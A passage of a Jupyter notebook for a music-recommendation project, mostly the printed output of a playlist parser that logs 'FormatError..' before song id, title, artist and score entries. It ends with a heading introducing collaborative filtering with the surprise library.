Brightman:::100.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28059284:::Earth: The Oldest Computer (The Last Night) (feat. Macklemore)\n\nFormatError..\n:::Childish Gambino:::20.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27533077:::夢を抱いて~はじまりのクリスロード~ (instrumental)\n\nFormatError..\n - instrumental:::Rake:::35.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n22773056:::ODIN SPHERE’s Theme-Shanachie ver.-【エンディング】\n\nFormatError..\n:::崎元仁:::15.0\n\nFormatError..\n32408314:::\n\nFormatError..\nKishinjou set 03 ~ 運河を行き交う人妖:::凛:::20.0\n\nFormatError..\n32408315:::\n\nFormatError..\nKishinjou set 04 ~ 柳の下のデュラハン:::凛:::15.0\n\nFormatError..\n32408321:::\n\nFormatError..\nKishinjou set 09 ~ 空中に沈む輝針城:::凛:::5.0\n\nFormatError..\n32408322:::\n\nFormatError..\nKishinjou set 10 ~ リバースイデオロギー:::凛:::20.0\n\nFormatError..\n32408323:::\n\nFormatError..\nKishinjou set 11 ~ 針小棒大の天守閣:::凛:::15.0\n\nFormatError..\n32408324:::\n\nFormatError..\nKishinjou set 12 ~ 輝く針の小人族:::凛:::20.0\n\nFormatError..\n32408328:::\n\nFormatError..\nKishinjou set 16 ~ 不思議な不思議な道具達:::凛:::5.0\n\nFormatError..\n32408334:::\n\nFormatError..\nAmanojaku set 00 ~ 反則の狼煙を上げろ:::凛:::5.0\n\nFormatError..\n32408335:::\n\nFormatError..\nAmanojaku set 01 ~ 不可能弾幕には反則を:::凛:::15.0\n\nFormatError..\n32408338:::\n\nFormatError..\nAmanojaku set 03 ~ ロマンチック逃飛行:::凛:::15.0\n\nFormatError..\n32408339:::\n\nFormatError..\nAmanojaku set 04 ~ 永遠の三日天下:::凛:::15.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::60.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n26878881:::\n\nFormatError..\nWolfgang Amadeus Mozart: Serenata notturna in D, K.239 - 2. Menuetto - Trio:::Herbert von Karajan:::15.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27582794:::\n\nFormatError..\n丑三つ時の里:::黄昏フロンティア:::25.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n27582794:::\n\nFormatError..\n丑三つ時の里:::黄昏フロンティア:::25.0\n\nFormatError..\n543634:::江南の大国・呉の参戦\n\nFormatError..\n:::横山菁児:::60.0\n\nFormatError..\n28059284:::Earth: The Oldest Computer (The Last Night) (feat. Macklemore)\n\nFormatError..\n:::Childish Gambino:::20.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n5157818:::Divertimento in D, K.334 - 3. Menuetto - Trio - \n\nFormatError..\nMenuetto:::Wiener MozartEnsemble:::20.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n31704021:::\n\nFormatError..\nTe Iria A Buscar:::DatPhoria:::15.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n31654791:::\n\nFormatError..\nEuropean Intrigue:::Tim Wynn:::45.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n4470537:::Би дуртай \n\nFormatError..\nTs.Khulan\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nBi durtai:::Hurd:::55.0\n\nFormatError..\n4470518:::Яг л чам шиг \n\nFormatError..\nSükhzorig\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nYag l cham shig:::Hurd:::40.0\n\nFormatError..\n4470529:::Намуухан орчлон \n\nFormatError..\nT.Erdenetsogt\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nNamuukhan orchlon:::Hurd:::65.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28576609:::\n\nFormatError..\nロビンとフランキーとブルック ~軍隊蟻たちの狙い~:::浜口史郎:::20.0\n\nFormatError..\n28576630:::\n\nFormatError..\nベイビーダンス ~ダンスは求愛の印?~:::田中公平:::20.0\n\nFormatError..\n28576624:::\n\nFormatError..\n先制攻撃 ~鼓動のボリュームを上げろ!~ :::浜口史郎:::25.0\n\nFormatError..\n28576631:::\n\nFormatError..\nシキ ナミをあきらめる ~ルフィ登場~:::浜口史郎:::20.0\n\nFormatError..\n28576623:::\n\nFormatError..\n最後の戦い ~渾身の巨人の雷斧(ギガント・トールアックス)~:::浜口史郎:::50.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n687792:::Eternal Rite (Switch Remix)\n\nFormatError..\n(幽雅に咲かせ、墨染の桜 ~ Border of Life/东方妖々梦より):::Alstroemeria Records:::10.0\n\nFormatError..\n27582794:::\n\nFormatError..\n丑三つ時の里:::黄昏フロンティア:::25.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n1512368:::listen\n\nFormatError..\n11. Concerto in F minor for Violin, String Orchestra and Continuo, Op. 8, No. 4, RV 297,L'inverno(Winter): II. Largo:::Joshua Bell:::20.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n33497925:::\n\nFormatError..\nFrédéric Chopin: Etude for piano No. 23 in A minor, Op. 25/11, CT. 36:::Jorge Bolet:::70.0\n\nFormatError..\n28482246:::トップをねらえ!予告編集(完全版)0話\n\nFormatError..\n:::田中公平:::50.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n5157818:::Divertimento in D, K.334 - 3. Menuetto - Trio - \n\nFormatError..\nMenuetto:::Wiener MozartEnsemble:::20.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n4470537:::Би дуртай \n\nFormatError..\nTs.Khulan\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nBi durtai:::Hurd:::55.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n28122491:::Samhradh Samhradh\n\nFormatError..\n:::The Gloaming:::5.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::60.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n1512377:::listen\n\nFormatError..\n13. Sonata in G minor for Violin and Basso Continuo,Devil's Trill Sonata:::Joshua Bell:::5.0\n\nFormatError..\n25731912:::SONATA No.1 en Si b Mayor, RV.47 Largo Allegro\n\nFormatError..\n :::Paul Tortelier:::70.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n17742280:::\n\nFormatError..\nJohann Sebastian Bach: Prelude and Fugue in C sharp (WTK, Book, No.3), BWV 848 - Prelude:::Friedrich Gulda:::25.0\n\nFormatError..\n31654791:::\n\nFormatError..\nEuropean Intrigue:::Tim Wynn:::45.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n401386160:::\n\nFormatError..\n when you think about her and your brain says no don't do that:::In Love With A Ghost:::55.0\n\nFormatError..\n5090113:::Praia Brava歌手\n\nFormatError..\nMiraflores:::Various Artists:::10.0\n\nFormatError..\n725347:::fortissimo-the ultimate crisis- (instrumental)\n\nFormatError..\n:::fripSide:::50.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n427373827:::Champions (From \"Hands of Stone\") \n\nFormatError..\n:::Usher:::30.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n461124237:::\n\nFormatError..\nECHO (LET GO) (Max Styler Extended Remix):::Breathe Carolina:::20.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n17742280:::\n\nFormatError..\nJohann Sebastian Bach: Prelude and Fugue in C sharp (WTK, Book, No.3), BWV 848 - Prelude:::Friedrich Gulda:::25.0\n\nFormatError..\n1375664:::Suite No. 3 In G Minor, BWV 808 IV. Sarabande - Les Agréments De La Même Sarabande\n\nFormatError..\n:::Glenn Gould:::20.0\n\nFormatError..\n31477705:::\n\nFormatError..\nJohann Sebastian Bach: Goldberg Variations, BWV 988 - Variation 9 Canone alla Terza:::Elena Barshai:::20.0\n\nFormatError..\n31477724:::\n\nFormatError..\nJohann Sebastian Bach: Goldberg Variations, BWV 988 - Variation 27 Canone alla Nona:::Elena Barshai:::15.0\n\nFormatError..\n33190071:::Theme of Blood Blockade Battlefront\n\nFormatError..\n:::岩崎太整:::65.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n27704949::: \n\nFormatError..\n투명인간 (feat. 있다) (prod. The Quiett):::Fana:::5.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n32408897:::\n\nFormatError..\n星空から来た少女:::Elements Garden:::20.0\n\nFormatError..\n3696073:::George Murphy\n\nFormatError..\nTrack:::Tom Lehrer:::5.0\n\nFormatError..\n4964484:::\n\nFormatError..\n魔物退治に、お力を貸して頂けますか:::松来未佑:::60.0\n\nFormatError..\n4964487:::頑張ってください。これ、お守りです\n\nFormatError..\n:::松来未佑:::60.0\n\nFormatError..\n4964470:::ウェルカム。あの、ようこそ練馬へ\n\nFormatError..\n:::松来未佑:::20.0\n\nFormatError..\n427142111:::ウタカタ \n\nFormatError..\n(原曲: ミストレイク):::Re:Volte:::25.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n27591065:::Sonate für Klavier h-moll S 178 - Lento\n\nFormatError..\n:::Alfred Brendel:::15.0\n\nFormatError..\n404184640:::사랑해요(I Love You)\n\nFormatError..\n(inst.):::金泰妍:::65.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n31704017:::\n\nFormatError..\nEverything I Need:::DatPhoria:::20.0\n\nFormatError..\n26878881:::\n\nFormatError..\nWolfgang Amadeus Mozart: Serenata notturna in D, K.239 - 2. Menuetto - Trio:::Herbert von Karajan:::15.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n3049811:::O Meu Amo/Participacão de Alcione\n\nFormatError..\n:::Maria Bethânia:::5.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n28797112:::あるがまま\n\nFormatError..\n:::アナム&マキ:::25.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n31654811:::\n\nFormatError..\nAmerican Cowboys:::Tim Wynn:::65.0\n\nFormatError..\n29005604:::\n\nFormatError..\nSehnsucht nach dem Frühling (\"Komm, lieber Mai\"), song for voice & pian:::Sky:::85.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26158540:::\n\nFormatError..\n窓辺にもたれる少女 アコースティックギター ver. - unplug:::菊地創:::40.0\n\nFormatError..\n33241159:::The End (Culture Code Remix)\n\nFormatError..\n:::Aruna:::20.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n4470529:::Намуухан орчлон \n\nFormatError..\nT.Erdenetsogt\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nNamuukhan orchlon:::Hurd:::65.0\n\nFormatError..\n4470555:::Зүйрлэх аргагүй \n\nFormatError..\nKh.Chilaajav\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nZüirlekh argagüi:::Hurd:::25.0\n\nFormatError..\n4470524:::Алт \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nAlt:::Hurd:::20.0\n\nFormatError..\n4470542:::Цоглог оюутан \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nTsoglog oyutan:::Hurd:::25.0\n\nFormatError..\n4470526:::Зөрөөд өнгөрсөн бүсгүй \n\nFormatError..\n \n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nZörööd öngörsön büsgüi:::Hurd:::25.0\n\nFormatError..\n4470515:::Энд нэг л биш ээ \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nEnd neg l bish ee:::Hurd:::25.0\n\nFormatError..\n4470533:::Ер бусын сүм \n\nFormatError..\nT.Erdenetsogt\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nYer busyn süm:::Hurd:::20.0\n\nFormatError..\n4470559:::Нүүдлийн кино театр \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nNüüdliin kino teatr:::Hurd:::25.0\n\nFormatError..\n4470521:::Зэвүүн харц \n\nFormatError..\nB.Oidov, P.Kherlen\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nZevüün kharts:::Hurd:::20.0\n\nFormatError..\n4470551:::Тоотой санагдах юм \n\nFormatError..\nKh.Purev\n\nFormatError..\nS.Ishkhüü\n\nFormatError..\nTootoi sanagdakh yum:::Hurd:::25.0\n\nFormatError..\n4470547:::Би амьдарч чадна \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nBi am'darch chadna:::Hurd:::20.0\n\nFormatError..\n4470518:::Яг л чам шиг \n\nFormatError..\nSükhzorig\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nYag l cham shig:::Hurd:::40.0\n\nFormatError..\n4470571:::Хөгшин атаман \n\nFormatError..\nB.Oidov\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nKhögshin ataman:::Hurd:::20.0\n\nFormatError..\n4470537:::Би дуртай \n\nFormatError..\nTs.Khulan\n\nFormatError..\nD.Otgonbaatar\n\nFormatError..\nBi durtai:::Hurd:::55.0\n\nFormatError..\n4470565:::Хонгор сэтгэл \n\nFormatError..\nB.Bayandalai\n\nFormatError..\nD.Otgonbayar\n\nFormatError..\nKhongor setgel:::Hurd:::30.0\n\nFormatError..\n461231833:::Yiruma: River Flows In You\n\nFormatError..\n:::黄旭洋:::40.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n31311586:::Cameltoe(Original Mix)\n\nFormatError..\n:::Rolvario:::15.0\n\nFormatError..\n401386160:::\n\nFormatError..\n when you think about her and your brain says no don't do that:::In Love With A Ghost:::55.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n33241159:::The End (Culture Code Remix)\n\nFormatError..\n:::Aruna:::20.0\n\nFormatError..\n686282:::Chapter1 MainBGM \n\nFormatError..\nPSP ver:::ARTERY VEIN:::55.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n27591798:::THIS ILLUSION (inst. 2012 remaster)\n\nFormatError..\n - instrumental:::深澤秀行:::20.0\n\nFormatError..\n22673328:::HaruHaru -Japanese Version- (Bonus Track)\n\nFormatError..\n:::BIGBANG:::80.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n654309:::1. ヴァイオリン协奏曲 ホ短调 作品64 第1楽章:Allegro molto appassionato\n\nFormatError..\n试聴する:::诹访内晶子:::15.0\n\nFormatError..\n654316:::2. ヴァイオリン协奏曲 ホ短调 作品64 第2楽章:Andante\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654321:::3. ヴァイオリン协奏曲 ホ短调 作品64 第3楽章:Allegretto non troppo-Allegro molto vivace\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654327:::4. ヴァイオリン协奏曲 ニ长调 作品35 第1楽章:Allegro moderato\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654333:::5. ヴァイオリン协奏曲 ニ长调 作品35 第2楽章:Canzonetta:Andante\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n654338:::6. ヴァイオリン协奏曲 ニ长调 作品35 第3楽章:Finale:Allegro vivacissimo\n\nFormatError..\n试聴する:::诹访内晶子:::10.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::60.0\n\nFormatError..\n27465106:::Can\n\nWall time: 11.5 s\n"
],
[
"%time parse_file(\"./RawData/popular.playlist\",\"./InternalData/6_popular_playlist.pkl\",\"./InternalData/7_popular_song.pkl\")",
"FormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n424496188:::大王叫我来巡山 - (原唱:\n\nFormatError..\n 贾乃亮/贾云馨):::流浪的蛙蛙:::65.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::95.0\n\nFormatError..\n427373827:::Champions (From \"Hands of Stone\") \n\nFormatError..\n:::Usher:::30.0\n\nFormatError..\n31654811:::\n\nFormatError..\nAmerican Cowboys:::Tim Wynn:::65.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nWall time: 722 ms\n"
]
],
[
[
"### 4 使用协同过滤建模并进行预测\n#### 使用surprise 自带的movielens 数据集",
"_____no_output_____"
]
],
[
[
